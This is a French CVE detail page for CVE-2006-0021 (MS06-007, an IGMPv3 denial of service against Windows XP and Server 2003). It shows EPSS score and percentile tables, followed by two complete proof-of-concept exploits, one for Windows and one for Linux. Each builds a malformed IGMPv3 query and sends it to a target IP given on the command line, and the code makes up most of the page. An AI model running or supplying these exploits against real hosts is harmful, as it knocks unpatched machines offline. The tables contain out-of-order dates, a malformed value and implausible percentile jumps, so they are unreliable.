CVE-2006-0021 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	51.48%	–	–
2022-04-03	–	–	51.48%	–	–
2023-03-12	–	–	–	96.71%	–
2023-04-16	–	–	–	96.72%	–
2023-05-21	–	–	–	96.69%	–
2023-07-16	–	–	–	96.62%	–
2023-08-27	–	–	–	96.68%	–
2023-09-24	–	–	–	96.68%	–
2023-10-22	–	–	–	96.62%	–
2023-11-05	–	–	–	96.62%	–
2024-01-07	–	–	–	96.52%	–
2024-06-02	–	–	–	96.52%	–
2024-06-09	–	–	–	94.68%	–
2024-12-22	–	–	–	66.5%	–
2025-01-26	–	–	–	79.56%	–
2025-01-19	–	–	–	66.5%	–
2025-01-25	–	–	–	79.56%	–
2025-03-18	–	–	–	–	64.3%
2025-03-30	–	–	–	–	65.82%
2025-03-30	–	–	–	–	65.82,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	98%
2022-04-03	99%
2023-03-12	99%
2023-04-16	99%
2023-05-21	99%
2023-07-16	99%
2023-08-27	99%
2023-09-24	1%
2023-10-22	99%
2023-11-05	1%
2024-01-07	1%
2024-06-02	1%
2024-06-09	99%
2024-12-22	98%
2025-01-26	99%
2025-01-19	98%
2025-01-25	99%
2025-03-18	98%
2025-03-30	98%
2025-03-30	98%

/* IGMP v3 DoS Exploit ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx by Alexey Sintsov (dookie@inbox.ru) Req: Administrator rights on system Windows Firewall off (for sending RAW packets) Affected Products: Microsoft Corporation Windows XP All Microsoft Corporation Windows Server 2003 All */ #include <stdio.h> #include <winsock2.h> #pragma comment(lib, "Ws2_32.lib") typedef struct iphdr { unsigned char verlen; // IP version & length unsigned char tos; // Type of service unsigned short total_len; // Total length of the packet unsigned short ident; // Unique identifier unsigned short frag_and_flags; // Flags unsigned char ttl; // Time to live unsigned char proto; // Protocol (TCP, UDP etc) unsigned short checksum; // IP checksum unsigned int sourceIP; // Source IP unsigned int destIP; // Destination IP unsigned short options[2]; } IPHEADER; typedef struct igmphdr { unsigned char type; unsigned char code; unsigned short checksum; unsigned long group; unsigned char ResvSQVR; unsigned char QQIC; unsigned short num; unsigned long addes; } IGMPHEADER; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int sendIGMP(char* a, char* b) { unsigned int dst_addr, src_addr; IPHEADER ipHeader; IGMPHEADER igmpHeader; dst_addr=inet_addr (b); src_addr=inet_addr (a); char szSendBuf[60]={0}; int rect; WSADATA WSAData; if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = WSASocket(AF_INET,SOCK_RAW, IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) { printf("Create socket error"); WSACleanup(); return FALSE; } BOOL flag=TRUE; if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { printf("Set options error"); closesocket(sock); WSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=htons(99); ssin.sin_addr.s_addr=dst_addr; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); ipHeader.ident=htons(0); ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_IGMP; ipHeader.checksum=0; ipHeader.tos=0; ipHeader.destIP=dst_addr; ipHeader.sourceIP=src_addr; //Ip options ipHeader.options[0]=htons(0x0000); //bug is here =) ipHeader.options[1]=htons(0x0000); igmpHeader.type=0x11; //v3 Membership Query igmpHeader.code=5; igmpHeader.num=htons(1); igmpHeader.ResvSQVR=0x0; igmpHeader.QQIC=0; igmpHeader.group=inet_addr("0.0.0.0"); igmpHeader.addes=dst_addr; igmpHeader.checksum=0; memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader)); igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4); ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader))); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { printf("Send error: <%d>\n",WSAGetLastError()); closesocket(sock); WSACleanup(); return 0; } closesocket(sock); WSACleanup(); return 1; } main(int argc, char **argv) { if(argc<2) { printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n"); printf("Usage:\n"); printf("c:\\igmps.exe <target ip> <source ip>\n\n"); exit(0); } sendIGMP(argv[2], argv[1]); return 0; } // milw0rm.com [2006-03-21]

/* MS06-007 Denial of Service POC exploit created by Firestorm, based on zloSend.exe win32 exploit (http://www.securitylab.ru/poc/264136.php) Tested on Windows XP SP2 as victim (compiled/runned on Fedore Core 4 x86) FOR EDUCATIONAL PURPOSE ONLY !!! */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> struct iphdr { unsigned char ihl:4, version:4, tos; unsigned short tot_len, id, frag_off; unsigned char ttl, protocol; unsigned short check; unsigned int saddr, daddr; unsigned int options1; unsigned int options2; }; struct igmpv3_query { unsigned char type; unsigned char code; unsigned short csum; unsigned int group; unsigned char qqic; unsigned char qrv:3, suppress:1, resv:4; unsigned short nsrcs; unsigned int srcs[1]; }; unsigned short in_chksum(unsigned short *, int); long resolve(char *); long resolve(char *host) { struct hostent *hst; long addr; hst = gethostbyname(host); if (hst == NULL) return(-1); memcpy(&addr, hst->h_addr, hst->h_length); return(addr); } int main(int argc, char *argv[]) { struct sockaddr_in dst; struct iphdr *ip; struct igmpv3_query *igmp; long daddr, saddr; int s, i=0, c, len, one=1; char buf[1500]; if (argc < 3) { printf("MS06-007 Denial of Service POC exploit by Firestorm\n"); printf("Usage: %s <src> <dst>\n", *argv); return(1); } daddr = resolve(argv[2]); saddr = resolve(argv[1]); memset(buf, 0, 1500); ip = (struct iphdr *)&buf; igmp = (struct igmpv3_query*)&buf[sizeof(struct iphdr)]; dst.sin_addr.s_addr = daddr; dst.sin_family = AF_INET; ip->ihl = 7; ip->version = 4; ip->tos = 0; ip->tot_len = htons(44); ip->id = htons(18277); ip->frag_off=0; ip->ttl = 128; ip->protocol = IPPROTO_IGMP; ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr)); ip->saddr = saddr; ip->daddr = daddr; ip->options1 = 0; ip->options2 = 0; igmp->type = 0x11; igmp->code = 5; igmp->group=inet_addr("224.0.0.1"); igmp->qqic=0; igmp->qrv=0; igmp->suppress=0; igmp->resv=0; igmp->nsrcs=htons(1); igmp->srcs[0]=daddr; igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero. igmp->csum=in_chksum((unsigned short *)igmp, sizeof(struct igmpv3_query)); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]); if (sendto(s,&buf,44,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } return(0); } unsigned short in_chksum(unsigned short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } // milw0rm.com [2006-03-22]